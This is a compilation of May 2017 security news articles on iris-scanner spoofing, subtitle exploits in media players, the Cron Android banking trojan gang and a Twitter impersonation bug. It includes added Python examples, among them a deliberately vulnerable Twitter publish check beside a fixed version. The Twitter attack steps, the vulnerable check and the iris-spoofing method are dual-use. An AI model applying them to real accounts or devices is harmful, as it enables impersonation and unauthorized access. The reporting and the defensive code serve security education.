The CCC said that if rumors turn out to be true and the next iPhone generation will have an iris scanner, they will try to defeat that one as well.

Biometrics are increasingly popular, especially in the financial industry. Banks are now allowing customers to use selfies, their voice and their fingerprints for authentication and authorization.

While biometric authentication is often advertised as highly secure, there are ways to defeat it. A BBC reporter demonstrated recently that his non-identical twin brother could access his HSBC account by fooling the bank’s voice ID authentication service.


Flashpoint Enhances Risk Intelligence Platform

24.5.2017 securityweek Security
Just as global intelligence firm Stratfor extracts and presents geopolitical intelligence from the noise of available information, so now does Flashpoint extract cyber business risk intelligence (BRI) from the noise of deep and dark web conversations.

Flashpoint is not new to BRI. It raised $10 million in Series B funding in July 2016 and announced its expansion from cyber threat intelligence into business risk intelligence. "Looking beyond cyber threat Intelligence, BRI ultimately informs decision-making, improves preparation, and mitigates risk throughout an entire organization," said Flashpoint at the time.

That process has now come to fruition with today's launch of the Flashpoint Intelligence Platform 3.0. It aims to convert and present the raw intelligence gleaned from the deep and dark web as actionable business risk intelligence that will help customers take a more strategic role in security planning.

Most threat intelligence ultimately comes from the deep and dark web. This is where cyber criminals share information, trade malware and boast about exploits. But access is difficult. The deepest and darkest areas are well-protected, and only accessible to 'approved' people. Flashpoint has a team of expert analysts, often with 3-letter agency backgrounds, who spend the time and effort necessary to get into the darkest corners.

This is where Flashpoint gleans its threat intelligence. It comes from actual dialogue between threat actors; from black market products and services; from where malicious tactics, techniques and procedures (TTPs) are discussed; and where weapons and training manuals are shared.

But threat intelligence falls short of business risk intelligence. "Some threat intelligence solutions can be no different than URL filtering, merely contributing to the greater noise," warns Gartner Research VP, Greg Young. "Instead, good threat intelligence solutions are customized and able to deliver a high-confidence alert to initiate an actionable response. Peering out at what often looks like a world of shadows and hostility, security teams can see specificity as a key to the achievement of their best success with limited resources."

For most organizations, access to any threat intelligence comes from surface web reports produced by different security vendors. These often discuss individual threats discovered by individual vendors, often focusing on their own product sphere. While these are valuable, they present a piecemeal view of the overall threat landscape.

In this sense, Flashpoint is vendor-neutral: it provides intelligence rather than product. Its new development is to generate and present actual risk intelligence from the raw threat intelligence. But its team of analysts doesn't just gather intelligence from the dark web; it converts it, through analysis reports, into business-actionable information -- in short, it adds context that goes beyond cyber.

"Traditional cyber threat intelligence, which has been largely focused on indicators of compromise, is insufficient in supporting the risk decision-making process, as it too often limits its focus on events in cyberspace," warned Flashpoint in its Business Risk Intelligence - Decision Report, published in January 2017. "Not all actors constrain their operations solely to the cyber realm; top tier nation-states like the U.S. and Russia use the full-spectrum of their capabilities to achieve their objectives. A threat assessment of Chinese or Russian cyber operations without the context of the national objectives they are supporting fails to provide risk decision-makers with an accurate portrayal of the threat landscape upon which to make business decisions."

The Intelligence Platform 3.0 provides access to Flashpoint's analyses with a finished intelligence experience. Users can use it to search Flashpoint's reports, focusing on specific areas of interest and including both cybercrime intelligence and physical threat intelligence -- or they can pivot directly into a sanitized sandbox of the original threat actor data. The result helps the security team understand the overall threat landscape, and provides the materials necessary to translate threats into business risks consumable by senior management.


CEOs and Coffee Shops Are Mobile Computing's Biggest Risks: Report

24.5.2017 securityweek Mobil
The balance between encouraging mobility for business purposes and controlling it for security remains as tricky today as ever. Ninety-three percent of organizations are now somewhat or very concerned that the mobile workforce is presenting an increasing number of security challenges. Of these, 47% are 'very concerned'; a figure that has grown from 36% a year ago.

These figures come from the iPass 2017 Mobile Security Report (PDF), published today. iPass is a global provider of always-on, secure Wi-Fi; with more than 60 million hotspots in more than 120 countries.

Vanson Bourne surveyed 500 CIOs and senior IT decision makers from the US (200), UK (100), Germany (100) and France (100). While the results are broadly consistent across all regions, there are nevertheless some surprising differences. For example, while there is acknowledgement that security is needed, there is apparent recognition that control is difficult -- and the extent of the problem and ways to solve it differ by geographic region.

Less than a third of companies ban the use of public Wi-Fi at all times, while a further 37% ban its use 'sometimes'. More surprising, however, is the regional difference: 44% of UK organizations do not ban it and do not plan to introduce a ban, but only 10% of US companies say the same. Eight percent of UK companies have no concern over mobile security, while only 1% of US companies have none.

Coffee shops are unsurprisingly a major cause of concern. "Wherever there is an unsecured public Wi-Fi network," notes the report, "there is the threat of attack. However, coffee shops are seen as the most dangerous public Wi-Fi venue of all." Across all regions surveyed, 42% of respondents cited coffee shops as their major concern over public Wi-Fi. "Cafes and coffee shops are everywhere and offer both convenience and comfort for mobile workers, who flock to these venues for the free high speed internet as much as for the coffee," comments Raghu Konka, vice president of engineering at iPass. "However, cafes invariably have lax security standards, meaning that anyone using these networks will be potentially vulnerable."

Cafes are followed by airports (30%) and hotels (16%) as the locations giving most concern over public Wi-Fi.

Man-in-the-middle (MitM) attacks are considered the greatest threat, cited by 69% of respondents. This is followed by lack of encryption (63%), hotspot spoofing (58%), and unpatched devices (55%).

The greatest risk, however, comes not from mid-level or even junior staff -- it is the CEO and other C-level executives. "The grim reality," explains Konka, "is that C-level executives are by far at the greatest risk of being hacked outside of the office. They are not your typical 9-5 office worker. They often work long hours, are rarely confined to the office, and have unrestricted access to the most sensitive company data imaginable. They represent a dangerous combination of being both highly valuable and highly available, therefore a prime target for any hacker."

The respondents agreed. Overall, 40% of respondents named the C-Suite. It was as low as 29% in the UK (possibly because there are fewer C-level executives), and as high as 49% in Germany. It was 40% in the US. Senior management came in as presenting the second most serious threat, at 34% overall. Not surprisingly, it was higher in the UK at 42%; and lower in the US at 26%.

The simple reality is that mobile working is an essential part of modern business, despite the security concerns about it. The survey suggests that in many cases total bans on public Wi-Fi are increasingly being adopted. "Sadly, in response to this growing threat, the majority of organizations are choosing to ban first and think later," comments Konka. "They ignore the fact that, in an increasingly mobile world, there are actually far more opportunities than threats. Rather than give in to security threats and enforce bans that can be detrimental or even unenforceable, businesses must instead ensure that their mobile workers have the tools to get online and work securely at all times."


Media Players Expose Millions of Systems to Subtitle Attacks

24.5.2017 securityweek Hacking
Malicious actors could hijack millions of systems using specially crafted subtitle files that exploit vulnerabilities in some of the most popular media players, security firm Check Point warned on Tuesday.

According to experts, attackers can take complete control of a device simply by getting the targeted user to open a malicious subtitle file in one of the vulnerable media players. In the case of applications that automatically obtain subtitles from the Internet, it may be possible to conduct attacks without any user interaction.

Check Point’s analysis has focused on four popular media players, but researchers believe other applications are likely affected as well. The players confirmed to be vulnerable are VLC, the open-source home theater software Kodi (formerly known as XBMC), the video streaming app Stremio, and Popcorn Time, which streams movies and TV shows directly from torrents.

Experts pointed out that the potential number of victims for these subtitle attacks is very high considering that the latest version of VLC has been downloaded 170 million times, and Kodi reportedly has nearly 40 million unique users each month.

The developers of these media players have released patches, but some issues are still under investigation and Check Point has decided not to make public any technical details.

According to the security firm, hackers can use specially crafted subtitle files to execute arbitrary code, which can allow them to take complete control of the system.

“The attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device,” Check Point’s research team said in a blog post. “The potential damage the attacker can inflict is endless, ranging anywhere from stealing sensitive information, installing ransomware, mass Denial of Service attacks, and much more.”

A video published by Check Point shows how the attack works.

While in some cases the targeted user needs to be convinced to open the malicious file with an affected player, researchers warned that attackers could also manipulate the ranking algorithm of subtitle websites to ensure that applications designed to automatically load subtitles would pick their file. By ensuring that their subtitle has a high ranking, attackers also increase the chances of users manually loading the malicious files.


New Product Allows Easy Addition of Multi-Factor Authentication to Any Application

24.5.2017 securityweek Safety
New Multi-factor Authentication Offering Seeks Balance Between Strong Security and Ease of Use

The correct balance between strong security and excessive control is difficult. Without strong security, such as multi-factor authentication (MFA), organizations will be breached. With excessive control (such as MFA always and everywhere), business will be impeded, employees will be disgruntled, and controls will be bypassed. A new behavioral authentication product announced today by security firm Preempt allows optional MFA, based on user behavior, on any application.

Preempt's new "Any App" offering seeks to solve the growing concern over the insider threat by allowing policy to dictate whether user access to any application should be challenged by multi-factor authentication requirements, or simply allowed. This increases security without increasing unnecessary impediment to business.

The insider threat is insidious. It can come from innocent users, 'malicious' users motivated by curiosity or worse, or hackers inside the network with stolen credentials. While modern network analytics can detect 'unusual' behavior, they cannot automatically distinguish between simple unusual and malicious unusual. The result is a large number of alerts that need to be investigated but are often false positives.

Preempt's Any App takes a different approach: it imposes strong security, in the form of multi-factor authentication requirements, on any specified application whenever -- but only if -- 'unusual' user behavior is detected. This is an advance on the more common approach of applying MFA to web applications only.

"Security teams want to better protect their organization and application from threats and breaches by adding policies that require users to validate their identity via authentication techniques before accessing corporate applications," explains Ajit Sancheti, co-founder and CEO of Preempt. But while adding MFA to web applications is relatively simple, protecting on-premises applications is more complex. Integrating secure authentication into each application requires significant resources, which typically leads to the majority of internal applications not being protected by MFA.

Any App, he continues, "removes the need for application customization, and turns the task of adding MFA support to applications into a simple matter of defining policy, which saves both time and money, while also protecting the organization from security breaches."

Any App works at the network layer for both Windows and Linux environments, and acts as an LDAP or Kerberos proxy. When a user first seeks access to an application, the application will attempt to verify the user. Any App proxies this request, and based on security policy can either allow access or require MFA.

If policy requires additional authentication, the organization's MFA solution is automatically triggered. Since Any App is vendor neutral, the MFA can come from the existing deployment of a range of vendors such as Duo, OKTA, and SecureAuth.

The behavioral policy engine within Any App allows the security team to define the conditions necessary to invoke MFA. For example, if the access request comes from an unmanaged device, or if the user is connecting to a new asset or from a new location or new device. This allows the security team to automatically apply more stringent controls without requiring individual alert analysis.

Any App attempts to allow the security team to define and control the balance between strong security and ease of use. It reduces the cost of strong security while activating it only where policy decides it is necessary.
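The decision flow described above (baseline of usual devices, locations and assets per user; step-up MFA only when a request looks unusual and the target application is one policy protects) as an added example. This is illustrative code, not Preempt's; the log format, field names, sample log lines and asset names are all assumptions constructed for the example.

```python
"""
Added example (not Preempt's code): a behavioral step-up policy of the
kind described above. A per-user baseline of devices, locations and
assets is built from constructed access-log lines, and a new request is
then answered with ALLOW or REQUIRE_MFA, as a proxy in front of the
application could do. Log format, field names and assets are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample of past authentication events (not real log data).
SAMPLE_LOG = """\
2017-05-20T08:02:11Z user=alice device=LT-0142 managed=yes src_geo=DE asset=hr-portal result=ok
2017-05-20T09:15:43Z user=alice device=LT-0142 managed=yes src_geo=DE asset=wiki result=ok
2017-05-21T08:10:02Z user=alice device=LT-0142 managed=yes src_geo=DE asset=hr-portal result=ok
2017-05-21T08:12:40Z user=alice device=LT-0142 managed=yes src_geo=DE asset=erp result=fail
2017-05-21T18:44:09Z user=bob device=WS-0777 managed=yes src_geo=US asset=erp result=ok
"""

# Applications the security team has chosen to protect with step-up MFA.
PROTECTED_ASSETS = {"hr-portal", "erp"}


@dataclass
class AccessRequest:
    user: str
    device: str
    managed: bool
    src_geo: str
    asset: str


@dataclass
class Baseline:
    devices: set = field(default_factory=set)
    geos: set = field(default_factory=set)
    assets: set = field(default_factory=set)


def parse_log_line(line: str):
    """Parse one 'key=value' log line into (AccessRequest, result)."""
    fields = dict(tok.split("=", 1) for tok in line.split()[1:])
    req = AccessRequest(
        user=fields["user"],
        device=fields["device"],
        managed=fields["managed"] == "yes",
        src_geo=fields["src_geo"],
        asset=fields["asset"],
    )
    return req, fields["result"]


def build_baselines(log_text: str):
    """Learn what is 'usual' per user from successful accesses only."""
    baselines = defaultdict(Baseline)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        req, result = parse_log_line(line)
        if result != "ok":
            continue  # failed attempts must not teach the baseline
        b = baselines[req.user]
        b.devices.add(req.device)
        b.geos.add(req.src_geo)
        b.assets.add(req.asset)
    return baselines


def decide(req: AccessRequest, baselines, protected=PROTECTED_ASSETS):
    """Return ("ALLOW" | "REQUIRE_MFA", [reasons]).

    Every unusual property is recorded as a reason; MFA is demanded only
    when the target asset is one the policy protects, so ordinary apps
    are not burdened with prompts.
    """
    reasons = []
    if not req.managed:
        reasons.append("unmanaged device")
    b = baselines.get(req.user)  # .get() does not create an empty baseline
    if b is None:
        reasons.append("no baseline for user")
    else:
        if req.device not in b.devices:
            reasons.append("new device")
        if req.src_geo not in b.geos:
            reasons.append("new location")
        if req.asset not in b.assets:
            reasons.append("new asset")
    if reasons and req.asset in protected:
        return "REQUIRE_MFA", reasons
    return "ALLOW", reasons
```

Note that a failed login to `erp` does not add `erp` to alice's baseline, so her first successful-looking request for it is still treated as a new asset; the reasons list is returned even when the decision is ALLOW so that the unusual access can be logged without generating an alert that someone has to triage.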


Twitter Bug Allowed Publishing Tweets From Any Account

24.5.2017 securityweek Social
A bug in the Twitter social network allowed an attacker to post tweets as a different user, without having access to the victim’s account.

Discovered by a security researcher going by the name of kedrisec, the issue was reported to Twitter on February 26 and was resolved two days later. The vulnerability was assessed High severity and the reporter received a $7,560 bounty for it.

The issue resided in the handling of Twitter Ads Studio requests, Twitter explains: “By sharing media with a victim user and then modifying the post request with the victim's account ID the media in question would be posted from the victim's account.”

No evidence of the flaw being exploited in the wild has been found so far, with the reporter being the only one to have leveraged the vulnerability, Twitter says.

In their write-up, the researcher explains that the issue leverages Twitter’s ads service, which “has media-library with the possibility to upload media-files (video, pictures, GIF-animation).” The service also offers the option to review media-files uploaded before and which were used when a tweet was published.

The library is located at https://ads.twitter.com/accounts/*id_of_user_account*/media and allows the user not only to view the media file, but also to tweet the file or share it with other users. The function for tweeting has access to account_id, owner_id (image owner), user_id (the user the tweet will be published to), and media_key (id of the media-file that is being published).

Attempts to replace the owner_id and user_id in the intercepted GET request and JSON, or in the POST, returned errors. The POST error, however, revealed that the service does not accept the user with the replaced owner_id as the owner of the media file.

The researcher then modified not only owner_id and user_id but also media_key in the POST, which resulted in a successful tweet publication. While this allowed the researcher to publish as any user, it had a limitation: publication worked only if the targeted user had media files uploaded, and the attacker also had to know the media_key of the file, which is almost impossible to guess, as it contains 18 digits.

However, if the attacker shared a media file with the targeted user (so the attacker already knows the media_key), the service would consider the victim to be the owner of the file, allowing the attacker to successfully impersonate the victim when tweeting.

In short, the attack consists of the following steps: uploading a file, sharing the file with the targeted user, intercepting the request for tweet publication, and changing the owner_id and user_id in the POST (the media_key, already known to the attacker, does not change).
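The authorization mistake behind this bug is a broken access control check: the server trusted the owner_id and user_id fields supplied in the request body, and "may use this media" (true for a file shared with you) was treated as equivalent to "may publish as this account". The following added example, which is illustrative and not Twitter's code, shows that vulnerable check beside a corrected one that derives the publishing identity from the authenticated session. The class and function names, the request shape and the 18-digit media key are constructed assumptions.

```python
"""
Added example (not Twitter's code): the server-side check that made the
Ads Studio bug possible, next to a hardened version. MediaStore,
publish_tweet_* and the request fields are illustrative assumptions.
"""
from dataclasses import dataclass, field


class Forbidden(Exception):
    pass


@dataclass
class Media:
    media_key: str
    owner_id: int
    shared_with: set = field(default_factory=set)


class MediaStore:
    def __init__(self):
        self._by_key = {}

    def add(self, media: Media):
        self._by_key[media.media_key] = media

    def get(self, key: str):
        return self._by_key.get(key)


def publish_tweet_vulnerable(store, session_user_id, body):
    """Trusts owner_id / user_id from the request body.

    The only check is that the *claimed* owner may use the media, which a
    user the file was shared with satisfies. The session identity is never
    compared with the account the tweet is published under.
    """
    media = store.get(body["media_key"])
    if media is None:
        raise Forbidden("unknown media")
    claimed_owner = body["owner_id"]
    if claimed_owner != media.owner_id and claimed_owner not in media.shared_with:
        raise Forbidden("not the owner of the media")
    return {"author": body["user_id"], "media_key": media.media_key}


def publish_tweet_fixed(store, session_user_id, body):
    """Takes every identity decision from the authenticated session.

    The publishing account must be the session user, and access to the media
    is checked for that same user, so body fields cannot redirect the post.
    """
    media = store.get(body["media_key"])
    if media is None:
        raise Forbidden("unknown media")
    if body.get("user_id") != session_user_id:
        raise Forbidden("cannot publish on behalf of another account")
    if session_user_id != media.owner_id and session_user_id not in media.shared_with:
        raise Forbidden("media not accessible to caller")
    return {"author": session_user_id, "media_key": media.media_key}


def build_demo_store():
    """Constructed scenario: attacker uploads a file and shares it with the target."""
    store = MediaStore()
    attacker, victim = 1001, 2002  # constructed account ids
    media = Media(media_key="123456789012345678", owner_id=attacker)  # constructed 18-digit key
    media.shared_with.add(victim)
    store.add(media)
    return store, attacker, victim, media.media_key


def demo():
    """Replay the tampered request against both checks; return (vulnerable author, fixed outcome)."""
    store, attacker, victim, key = build_demo_store()
    tampered = {"account_id": attacker, "owner_id": victim, "user_id": victim, "media_key": key}
    vulnerable_author = publish_tweet_vulnerable(store, attacker, tampered)["author"]
    try:
        publish_tweet_fixed(store, attacker, tampered)
        fixed_outcome = "published"
    except Forbidden as exc:
        fixed_outcome = str(exc)
    return vulnerable_author, fixed_outcome


if __name__ == "__main__":
    print(demo())
```

The general rule the fix applies is that a request body may name the object to act on, but never the principal acting: the author of a tweet, like any authorization subject, must come from the session, and object-level checks (ownership or sharing) are evaluated for that principal only.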


Beware! Subtitle Files Can Hack Your Computer While You're Enjoying Movies
24.5.2017 thehackernews Hacking
Do you watch movies with subtitles?
Just last night, I wanted to watch a French movie, so I searched for English subtitles and downloaded it to my computer.
Though that film was excellent, this morning a new research from Checkpoint scared me.
I was unaware that a little subtitle file could hand over full control of my computer to hackers, while I was enjoying the movie.
Yes, you heard that right.
A team of researchers at Check Point has discovered vulnerabilities in four of the most popular media player applications, which can be exploited by hackers to hijack "any type of device via vulnerabilities; whether it is a PC, a smart TV, or a mobile device" with malicious code inserted into subtitle files.
"We have now discovered malicious subtitles could be created and delivered to millions of devices automatically, bypassing security software and giving the attacker full control of the infected device and the data it holds," the researchers added.
These four vulnerable media players (mentioned below) have been downloaded more than 220 million times:
VLC — Popular VideoLAN Media Player
Kodi (XBMC) — Open-Source Media Software
Popcorn Time — Software to watch Movies and TV shows instantly
Stremio — Video Streaming App for Videos, Movies, TV series and TV channels
The vulnerabilities reside in the way various media players process subtitle files and, if exploited successfully, could put hundreds of millions of users at risk of getting hacked.
As soon as the media player parses the malicious subtitle file, before displaying the actual subtitles on your screen, the hackers are granted full control of the computer or smart TV on which you ran it.
Proof-of-Concept Video

In the above video, the researchers demonstrated how a maliciously crafted subtitle file for a movie, added to the Popcorn Time media player, can hijack a Windows PC. On the right-hand side of the screen, an attacker running Kali Linux gains remote access to the system as soon as the victim adds the subtitle file.
Since text-based subtitles for movies and TV shows are created by writers and then uploaded to Internet repositories such as OpenSubtitles and SubDB, hackers could also craft malicious subtitle files for the same TV shows and movies.
"Our researchers were also able to show that by manipulating the website’s ranking algorithm, we could guarantee crafted malicious subtitles would be those automatically downloaded by the media player, allowing a hacker to take complete control over the entire subtitle supply chain, without resorting to a Man in the Middle attack or requiring user interaction," CheckPoint researchers said.

The researchers believe that similar security vulnerabilities also exist in other streaming media players.
How to Protect Your Computer from Hackers?
Check Point has already informed the developers of VLC, Kodi, Popcorn Time and Stremio applications about the recently discovered vulnerabilities.
"To allow the developers more time to address the vulnerabilities, we’ve decided not to publish any further technical details at this point," the researchers said.
All of them have patched the flaws, with Stremio and VLC having released patched versions of their software: Stremio 4.0 and VLC 2.2.5, which has been available for two weeks.
Kodi developer Martijn Kaijser said the official 17.2 release would arrive later this week, while users can already get a fixed version online. A patch for Popcorn Time is also available online.
So, users are advised to update their media player as soon as possible.
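Both reports above (the SecurityWeek piece and this one) make the same point: a media player parses a subtitle file it fetched from a public repository, and parsing bugs turn that text file into a code-execution vector. Check Point has withheld the technical details, so the following added example does not reproduce any of the actual flaws. It instead shows the defensive side, a strict SubRip (.srt) parser that treats the file as untrusted input and rejects anything outside a tight grammar and fixed limits. This is illustrative code, not VLC's, Kodi's, Stremio's, Popcorn Time's or Check Point's; the limits and sample files are assumptions constructed for the example.

```python
"""
Added example (not Check Point's, VLC's, Kodi's, Stremio's or Popcorn
Time's code): a strict SubRip (.srt) parser that treats the file as
untrusted input. Limits on size, cue count, line length and timestamp
fields are enforced and anything outside them is rejected. The limits
and the sample files are assumptions constructed for illustration.
"""
import re

MAX_FILE_BYTES = 512 * 1024   # subtitle files are small; cap what is even read
MAX_CUES = 5000
MAX_LINES_PER_CUE = 4
MAX_LINE_LEN = 256
MAX_INDEX_DIGITS = 9

TIMESTAMP_RE = re.compile(
    r"^(\d{2}):(\d{2}):(\d{2}),(\d{3}) --> (\d{2}):(\d{2}):(\d{2}),(\d{3})$"
)


class SubtitleError(ValueError):
    """Raised for any input that does not meet the strict grammar."""


def _to_ms(h, m, s, ms):
    h, m, s, ms = int(h), int(m), int(s), int(ms)
    if m > 59 or s > 59:
        raise SubtitleError("timestamp field out of range")
    return ((h * 60 + m) * 60 + s) * 1000 + ms


def parse_srt(data: bytes):
    """Return a list of (start_ms, end_ms, text) cues or raise SubtitleError."""
    if len(data) > MAX_FILE_BYTES:
        raise SubtitleError("file too large")
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        raise SubtitleError("not valid UTF-8") from None
    # Normalise line endings once, then work on a fixed grammar.
    text = text.replace("\r\n", "\n").replace("\r", "\n").strip()
    if not text:
        return []
    cues = []
    for block in re.split(r"\n{2,}", text):
        lines = block.split("\n")
        if len(lines) < 2:
            raise SubtitleError("malformed cue")
        index = lines[0].strip()
        if not index.isdigit() or len(index) > MAX_INDEX_DIGITS:
            raise SubtitleError("bad cue index")
        m = TIMESTAMP_RE.match(lines[1].strip())
        if m is None:
            raise SubtitleError("bad timestamp line")
        start = _to_ms(*m.groups()[:4])
        end = _to_ms(*m.groups()[4:])
        if end < start:
            raise SubtitleError("cue ends before it starts")
        body = lines[2:]
        if len(body) > MAX_LINES_PER_CUE:
            raise SubtitleError("too many lines in cue")
        for line in body:
            if len(line) > MAX_LINE_LEN:
                raise SubtitleError("subtitle line too long")
            if any(ord(c) < 32 and c != "\t" for c in line):
                raise SubtitleError("control character in subtitle text")
        cues.append((start, end, "\n".join(body)))
        if len(cues) > MAX_CUES:
            raise SubtitleError("too many cues")
    return cues


def validate(data: bytes):
    """Non-raising wrapper: returns (accepted, reason)."""
    try:
        parse_srt(data)
        return True, "ok"
    except SubtitleError as exc:
        return False, str(exc)


# Constructed sample inputs (not real subtitle files).
GOOD_SRT = (
    b"1\r\n00:00:01,000 --> 00:00:03,500\r\nBonjour.\r\n\r\n"
    b"2\r\n00:00:04,000 --> 00:00:06,000\r\n<i>Au revoir.</i>\r\n"
)
OVERLONG_LINE_SRT = b"1\n00:00:01,000 --> 00:00:03,500\n" + b"A" * 4096 + b"\n"
BAD_TIMESTAMP_SRT = b"1\n00:00:99,000 --> 00:00:03,500\nx\n"
```

The design point is that every quantity the renderer will later rely on (number of cues, length of each line, numeric range of each timestamp) is bounded and checked before any cue is built, so a file that does not fit is refused as a whole rather than partially rendered. A player written in C needs the same caps applied before text is copied into fixed-size buffers; the limits here are generous for real subtitles and can be tightened.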


Cyber Crime Gang Arrested for Infecting Over 1 Million Phones with Banking Trojan
24.5.2017 thehackernews Virus
The Russian Interior Ministry announced on Monday the arrest of 20 individuals from a major cybercriminal gang that had stolen nearly $900,000 from bank accounts after infecting over one million Android smartphones with a mobile Trojan called "CronBot."
Russian Interior Ministry representative Rina Wolf said the arrests were part of a joint effort with Russian IT security firm Group-IB that assisted the massive investigation.
The collaboration resulted in the arrest of 16 members of the Cron group in November 2016, while the last active members were apprehended in April 2017, all living in the Russian regions of Ivanovo, Moscow, Rostov, Chelyabinsk, and Yaroslavl and the Republic of Mari El.
Targeted Over 1 Million Phones — How They Did It?

Group-IB first learned of the Cron malware gang in March 2015, when the criminal gang was distributing the Cron Bot malware disguised as Viber and Google Play apps.
The Cron malware gang abused the popularity of SMS-banking services and distributed the malware onto victims' Android devices by setting up apps designed to mimic banks' official apps.
The gang even inserted the malware into fake mobile apps for popular pornography websites, such as PornHub.
Once victims downloaded and installed these fake apps on their devices, the apps added themselves to auto-start, and the malware hidden inside them gave the hackers the ability to phish victims' banking credentials and intercept SMS messages containing confirmation codes sent by the bank to verify transactions.
"After installation, the program added itself to the auto-start and could send SMS messages to the phone numbers indicated by the criminals, upload SMS messages received by the victim to C&C servers, and hide SMS messages coming from the bank," writes Group-IB.
"The approach was rather simple: after a victim’s phone got infected, the Trojan could automatically transfer money from the user’s bank account to accounts controlled by the intruders. To successfully withdraw stolen money, the hackers opened more than 6 thousand bank accounts."
The gang usually sent text messages to the banks initiating a transfer of up to $120 to one of their 6,000 bank accounts the group set up to receive the fraudulent payments.
The malware would then intercept the two-step verification codes sent by the bank to confirm the transaction and block the victims from receiving a message notifying them about the transaction.
Cyberthieves Stole $900,000 in Russia Alone

On April 1, 2016, the gang advertised its Android banking Trojan, dubbed "Cron Bot," on a Russian-speaking forum, giving the Group-IB researchers and Russian authorities a clue to their investigation into the group's operation.
According to the security firm, the group stole approximately 8,000 rubles (nearly $100) from each victim on average, for a total of 50 million rubles (almost $900,000) from more than one million victims, with 3,500 unique Android devices infected per day.
After targeting customers of banks in Russia, where they lived, the Cron gang planned to expand its operation by targeting customers of banks in various countries, including the US, the UK, Germany, France, Turkey, Singapore, and Australia.
In June 2016, the gang rented a piece of malware called "Tiny.z" for $2,000 per month, designed to attack customers of Russian banks as well as international banks in Britain, Germany, France, the United States and Turkey, among other countries.
Despite operating only in Russia before their arrest, the gang members had already developed web injections for several French banks, including Credit Agricole, Assurance Banque, BNP Paribas, Banque Populaire, Boursorama, Caisse d'Epargne, Societe Generale and LCL, Group-IB said.
However, before the gang could launch attacks on French banks, the authorities managed to disrupt their operations by making several arrests, including the gang's founder, a 30-year-old resident of Ivanovo, Moscow.
During the raids, the authorities seized computer equipment, bank cards, and SIM cards associated with the criminal gang.


Police dismantled the Cron gang that targeted Bank Accounts via Android Malware
24.5.2017 securityaffairs  Android

Russian authorities with the support of the security firm Group-IB dismantled the operations of the Cron gang that infected more than 1 million smartphones.
Russian authorities dismantled a major criminal ring that was targeting bank accounts using Android malware, dubbed ‘Cron,’ that compromised more than one million Android smartphones.

According to the Russian Interior Ministry, the criminal organization had stolen nearly $900,000 from bank accounts.

Law enforcement, assisted by the cybersecurity firm Group-IB, identified 25 members of the organization, led by a 30-year-old living in the city of Ivanovo.

16 members of the gang were detained in November 2016, while the last active member was arrested in April.

The Cron Trojan was first spotted in March 2015, when the crime gang had been distributing the malware disguised as Viber and Google Play apps.

In early 2016, investigators discovered that an Android banking Trojan dubbed ‘Cron Bot’ was being offered for rent in the criminal underground. According to experts from IBM X-Force, the Cron Bot was leased for between $4,000 and $7,000, depending on the configuration chosen by the buyer.


The Cron gang used spam SMS messages to spread the malware to individuals in Russia, relying on a very effective social engineering technique. The SMS messages informed recipients that their ads or photos had been shared on a website and included links to a site that tricked victims into downloading and executing the malicious code.

“Spam SMS messages with a link to a website infected with the banking Trojan. The message was of the following form: “Your ad is posted on the website ….”, or “your photos are posted here.” After the user visits the compromised website, the malware will be downloaded on the device, tricking the victim to install it.” reads the report published by Group-IB.

“The victim could install the malicious program on the phone by downloading fake applications masked as legitimate ones. The Trojan is distributed under the guise of such applications as Navitel; Framaroot; Pornhub; Avito.“

Once the Cron Trojan infected a device, the malware could send SMS messages to any phone number, upload SMS messages received by the victim to C&C servers, and hide SMS messages coming from the bank. Using these features, the malware could intercept the 2FA messages sent to users to authorize fraudulent transactions conducted by the crooks.

The Cron gang earned approximately $900,000 USD (50 million rubles) from its activity.

“Every day Cron malware attempted to steal money from 50-60 clients of different banks. An average theft was about 8,000 rubles ($100). According to crime investigators, the total damage from Cron’s activity amounted to approximately $800 000 USD (50 million rubles). ” continues the report.

The investigators discovered that the Cron gang had decided to extend its activity to other countries: it rented the Tiny.z banking Trojan for $2,000 per month.

Experts speculate that the hackers had been planning to target French banking users, because the Cron gang had developed web injections for several French banks, including Credit Agricole, Assurance Banque, Banque Populaire, BNP Paribas, Boursorama, Caisse d’Epargne, Societe Generale and LCL.


Hackers demonstrated that it is too easy to bypass the Samsung S8 iris scanner.
24.5.2017 securityaffairs  Hacking

Hackers demonstrated that it is very easy to bypass the Samsung S8 iris scanner by using a camera, a printer, and a contact lens.
Security experts have once again bypassed a biometric system installed on a mobile device, this time the Samsung S8.

Hackers used a camera, a printer and a contact lens to bypass the iris scanner installed on the Samsung S8.

Some smartphones use biometric recognition for user authentication; researchers from the Chaos Computer Club (CCC) demonstrated that it is possible to easily bypass the S8's iris scanner and unlock the device.

“We’ve had iris scanners that could be bypassed using a simple print-out,” Linus Neumann, one of the experts who devised the hacking technique, told Motherboard in a Twitter direct message.

“The Samsung Galaxy S8 is the first flagship smartphone with iris recognition. The manufacturer of the biometric solution is the company Princeton Identity Inc. The system promises secure individual user authentication by using the unique pattern of the human iris.” reads the post published by the Chaos Computer Club.

“A new test conducted by CCC hackers shows that this promise cannot be kept: With a simple to make dummy-eye the phone can be fooled into believing that it sees the eye of the legitimate owner.”

The researchers emulated a thief capturing iris pictures with a digital camera in night-shot mode or with the infrared filter removed. Then, to give the image some depth, the experts placed a contact lens on top of the printed picture.

“The easiest way for a thief to capture iris pictures is with a digital camera in night-shot mode or the infrared filter removed. In the infrared light spectrum – usually filtered in cameras – the fine, normally hard to distinguish details of the iris of dark eyes are well recognizable.” continues the post. “Starbug was able to demonstrate that a good digital camera with 200mm-lens at a distance of up to five meters is sufficient to capture suitably good pictures to fool iris recognition systems.”

The researchers explained that they quickly found a way to defeat the iris recognition system implemented by Samsung, bypassing it after just one day of experiments.

“About a day of experimenting until the idea came up to use a contact lens. Then, a little charade of printers until it turned out that the Samsung printer provided the most reliable prints,” Neumann told Motherboard.


This isn’t the first time experts at the CCC have bypassed biometric locks on smartphones: the first proof-of-concept attack of this kind was presented at Germany’s Chaos Computer Club in 2013 to hack an iPhone 5s, and in 2014 the German researcher Jan Krissler, aka Starbug, demonstrated at the same hacking conference how to bypass fingerprint biometrics using only a few photographs.

In March, YouTube vlogger iDeviceHelp posted a video on his channel in which the user Marcianotech demonstrated how to unlock a Samsung Galaxy S8 or Galaxy S8 Plus by taking the device owner’s picture from Facebook and presenting the image to the locked phone.

Let’s wait for Samsung’s reply.


Hundreds of thousands of computers are still infected. WannaKey is meant to fix that

23.5.2017 Novinky/Bezpečnost Viruses
